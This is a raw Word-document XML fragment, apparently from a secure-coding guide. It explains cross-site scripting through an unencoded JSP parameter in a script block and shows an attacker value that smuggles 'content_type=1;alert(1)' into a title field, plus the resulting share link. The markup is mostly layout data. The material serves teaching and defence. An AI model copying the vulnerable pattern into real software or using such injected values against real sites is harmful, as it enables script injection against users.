                              <a:gd name="T31" fmla="*/ 204 h 1592"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 225 204"/>
                              <a:gd name="T35" fmla="*/ 225 h 1592"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1774 204"/>
                              <a:gd name="T39" fmla="*/ 1774 h 1592"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1795 204"/>
                              <a:gd name="T43" fmla="*/ 1795 h 1592"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1795 204"/>
                              <a:gd name="T47" fmla="*/ 1795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1592">
                                <a:moveTo>
                                  <a:pt x="8679" y="1591"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="1591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="1591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1570"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="156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1570"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="1591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679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03"/>
                            <a:ext cx="8700" cy="1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b/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sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;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script</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>&gt;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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F6EC6"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>var</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:spacing w:val="-14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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>contentType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4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pacing w:val="-1"/>
                                  <w:w w:val="95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rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-14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pacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;%=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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>Request</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="95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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>getParameter</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="95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spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>"content_type"</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>)%&gt;;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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F6EC6"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>var</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:color w:val="3F6EC6"/>
                                  <w:spacing w:val="-15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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>title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4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pacing w:val="-1"/>
                                  <w:w w:val="95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rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-14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spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>"&lt;%=Encode.forJavaScript(request.getParameter("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"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>title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spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>"))%&gt;"</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Console"/>
                                  <w:spacing w:val="-1"/>
                                  <w:w w:val="95"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>;</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="57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sz w:val="15"/>
                                </w:rPr>
                                <w:t>...</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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//some</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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user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agreement</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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and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sending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to</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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server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logic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might</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Lucida Consol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be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here</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="45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sz w:val="15"/>
                                </w:rPr>
                                <w:t>...</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                              <w:pPr>
                                <w:spacing w:before="44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sz w:val="15"/>
                                </w:rPr>
                                <w:t>&lt;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9" o:spid="_x0000_s1944" style="position:absolute;margin-left:80.7pt;margin-top:10.2pt;width:435pt;height:79.6pt;z-index:-15566336;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,204" coordsize="8700,1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">
                <v:shape id="Freeform 481" o:spid="_x0000_s1945" style="position:absolute;left:1614;top:203;width:8700;height:1592;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,1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2hw8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS2vDMBCE74X+B7GFXEoiO7R5OFFCWyi0xziv62Jt&#10;LCfWylhy4v77qlDIcZiZb5jlure1uFLrK8cK0lECgrhwuuJSwW77OZyB8AFZY+2YFPyQh/Xq8WGJ&#10;mXY33tA1D6WIEPYZKjAhNJmUvjBk0Y9cQxy9k2sthijbUuoWbxFuazlOkom0WHFcMNjQh6HikndW&#10;QX40W7krzl39vk/T5+/+9XDpGqUGT/3bAkSgPtzD/+0vreBlOoe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2hw8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m8679,1591r-8658,l18,1591,,1570r,-3l,21,21,,8679,r21,21l8700,1570r-18,21l8679,1591xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1795;21,1795;18,1795;0,1774;0,1771;0,225;21,204;8679,204;8700,225;8700,1774;8682,1795;8679,1795" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 480" o:spid="_x0000_s1946" type="#_x0000_t202" style="position:absolute;left:1614;top:203;width:8700;height:15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PxMc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j8THBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=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b/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sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w: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script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&gt;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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F6EC6"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>var</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:spacing w:val="-14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spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>contentType</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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pacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-14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pacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;%=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>Request</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>getParameter</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>(</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>"content_type"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>)%&gt;;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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F6EC6"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>var</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="3F6EC6"/>
                            <w:spacing w:val="-15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spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>title</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-14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pacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>=</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-14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1B7D4D"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>"&lt;%=Encode.forJavaScript(request.getParameter("</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>title</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="1B7D4D"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>"))%&gt;"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:spacing w:val="-1"/>
                            <w:w w:val="95"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>;</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="57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sz w:val="15"/>
                          </w:rPr>
                          <w:t>...</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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//some</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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user</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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agreement</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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and</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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sending</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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to</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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server</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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logic</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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might</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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be</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Consol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here</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="45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sz w:val="15"/>
                          </w:rPr>
                          <w:t>...</w:t>
                        </w:r>
                      </w:p>
                      <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
                        <w:pPr>
                          <w:spacing w:before="44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sz w:val="15"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w: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/script&gt;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3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>Content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="158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72" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="125"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>In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case</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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untrusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>title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“This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regular</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>title&amp;content_type=1;alert(1)”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link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"</w:t>
      </w:r>
      <w:r>
        <w:t>Content"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="10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5270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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5346700" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="475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6700" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="8420" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="476" name="Freeform 478"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="165"/>
                            <a:ext cx="8420" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10013 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8420"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8420"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8420"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8420"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8420"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8420"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8420"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 10013 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8420"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 10034 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8420"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 10034 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8420"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 10016 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8420"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 10013 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8420"/>
                              <a:gd name="T46" fmla="+- 0 348 166"/>
                              <a:gd name="T47" fmla="*/ 34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20" h="183">
                                <a:moveTo>
                                  <a:pt x="839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399" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8420" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8420" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8402" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="839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Text Box 477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165"/>
                            <a:ext cx="842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href="/share?content_type=1&amp;title=This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is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regular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5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title&amp;amp;content_type=1;alert(1)"&gt;Share&lt;/a&gt;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6" o:spid="_x0000_s1947" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:421pt;height:9.15pt;z-index:-15563776;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="842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">
                <v:shape id="Freeform 478" o:spid="_x0000_s1948" style="position:absolute;left:1614;top:165;width:8420;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="842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/ku8YA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE74W+w3IK3ummIramrlKUqEGE+tP7Q/Y0&#10;Cc2eDdlVo0/fFQQvh5n5hpnMWlOJMzWutKzgrR+BIM6sLjlXcDwkvQ8QziNrrCyTgis5mE1fOhOM&#10;tb3wjs57n4sAYRejgsL7OpbSZQUZdH1bEwfv1zYGfZBNLnWDlwA3lRxE0UgaLDksFFjTvKDsb38y&#10;ClZyu9yckvR7M0jGt3QxvP1gulCq+9p+fYLw1Ppn+NFeawXD9xHcz4QjIK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/ku8YAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m8399,182l21,182r-3,-1l,161r,-4l,21,21,,8399,r21,21l8420,161r-18,20l8399,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8399,348;21,348;18,347;0,327;0,323;0,187;21,166;8399,166;8420,187;8420,327;8402,347;8399,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 477" o:spid="_x0000_s1949" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:842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8ZYsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNi6hN3YgUBUEojemhx9fs&#10;M1mSfRuzq8Z/7xYKHoeZ+YZZLAfbijP13jhW8DJOQBCXThuuFHwXm+c5CB+QNbaOScGVPCyzx4cF&#10;ptpdOKfzPlQiQtinqKAOoUul9GVNFv3YdcTRO7jeYoiyr6Tu8RLhtpWvSTKVFg3HhRo7+qipbPYn&#10;q2D1w/naHD9/v/JDboriLeHdtFFq9DSs3kEEGsI9/N/eagWT2Qz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8ZYs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5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href="/share?content_type=1&amp;title=This</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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is</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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regular</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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title&amp;amp;content_type=1;alert(1)"&gt;Share&lt;/a&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Share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Page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Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>And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share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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could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this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="13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5321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128905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="1010920"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="472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1010920"/>
                          <a:chOff x="1614" y="203"/>
                          <a:chExt cx="8700" cy="1592"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="473" name="Freeform 475"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="203"/>
                            <a:ext cx="8700" cy="1592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1795 203"/>
                              <a:gd name="T3" fmla="*/ 1795 h 1592"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1795 203"/>
                              <a:gd name="T7" fmla="*/ 1795 h 1592"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1794 203"/>
                              <a:gd name="T11" fmla="*/ 1794 h 1592"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1774 203"/>
                              <a:gd name="T15" fmla="*/ 1774 h 1592"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1770 203"/>
                              <a:gd name="T19" fmla="*/ 1770 h 1592"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 224 203"/>
                              <a:gd name="T23" fmla="*/ 224 h 1592"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 203 203"/>
                              <a:gd name="T27" fmla="*/ 203 h 1592"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 203 203"/>
                              <a:gd name="T31" fmla="*/ 203 h 1592"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 224 203"/>
                              <a:gd name="T35" fmla="*/ 224 h 1592"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1774 203"/>
                              <a:gd name="T39" fmla="*/ 1774 h 1592"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1794 203"/>
                              <a:gd name="T43" fmla="*/ 1794 h 1592"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1795 203"/>
